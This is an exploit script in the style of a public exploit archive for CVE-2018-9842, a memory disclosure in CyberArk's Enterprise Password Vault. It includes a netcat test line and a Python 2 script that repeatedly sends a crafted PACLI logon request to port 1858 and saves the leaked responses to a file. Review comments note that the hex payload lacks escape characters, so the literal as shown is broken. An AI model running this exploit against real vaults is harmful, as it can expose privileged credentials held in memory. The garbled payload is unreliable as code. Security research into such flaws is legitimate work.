# Exploit Title: CyberArk < 10 - Memory Disclosure
# Date: 2018-06-04
# Exploit Author: Thomas Zuk
# Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
# Version: < 9.7 and < 10
# Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10
# CVE: CVE-2018-9842

# Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd
# paste the following bytes into a hexedited file named logon.bin:
#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


#!/usr/bin/python

import socket
import os
import sys

# Target endpoint: CyberArk's PACLI/administrative service listens on TCP 1858.
ip, port = "10.107.32.21", 1858

# CyberArk port 1858 carries a proprietary protocol used for login and administrative services.
# The literal below is the sample login request that elicits the memory-disclosing response.

# Sample PACLI logon request, expressed as one string literal.
# NOTE(review): as reproduced on this page the literal contains 'x' followed by
# hex digits with no backslash escapes, so in Python it is plain ASCII text,
# not the byte values the surrounding comments describe.  The script also
# assumes Python 2 str/bytes semantics (see the shebang above).
pacli_logon = "xffxffxffxffxf7x00x00x00xffxffxffxffx3dx01x00x00x50x61x63x6cx69x53x63x72x69x70x74x55x73x65x72x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x20x20x20x20xffxffxffxffx00x00x00x00x00x00x00x00x00x00x73x00x00x00xcexcexcexcex00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x30x3dx4cx6fx67x6fx6exfdx31x31x35x3dx37x2ex32x30x2ex39x30x2ex32x38xfdx36x39x3dx50xfdx31x31x36x3dx30xfdx31x30x30x3dxfdx32x31x37x3dx59xfdx32x31x38x3dx50x41x43x4cx49xfdx32x31x39x3dxfdx33x31x37x3dx30xfdx33x35x37x3dx30xfdx32x32x3dx50x61x63x6cx69x53x63x72x69x70x74x55x73x65x72xfdx33x36x37x3dx33x30xfdx00x00"


# Send the sample logon request 110 times and append every reply to a local
# file.  Each iteration opens a fresh TCP connection, so the server side sees
# a burst of 110 short-lived connections to TCP/1858 from one source, each
# carrying a logon message -- that connection pattern is what a defender can
# look for in firewall or vault logs.  The loop index itself is unused.
for iteration in range(0, 110):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    # NOTE(review): under Python 2 (per the shebang) a str is sent as-is;
    # under Python 3 send() rejects a str, so this line assumes Python 2.
    s.send(pacli_logon)

    # receive response: up to 200 bytes are read and discarded, then up to
    # 1500 further bytes are kept as the part of the reply of interest
    s.recv(200)
    reply = s.recv(1500)

    # write responses to file -- append mode, so the replies of all 110
    # iterations accumulate in one file.  `file` shadows the builtin name.
    file = open("cyberark_memory", "a")

    file.write("received: ")
    file.write(reply)
    file.write(" ")
    file.close()

    s.close()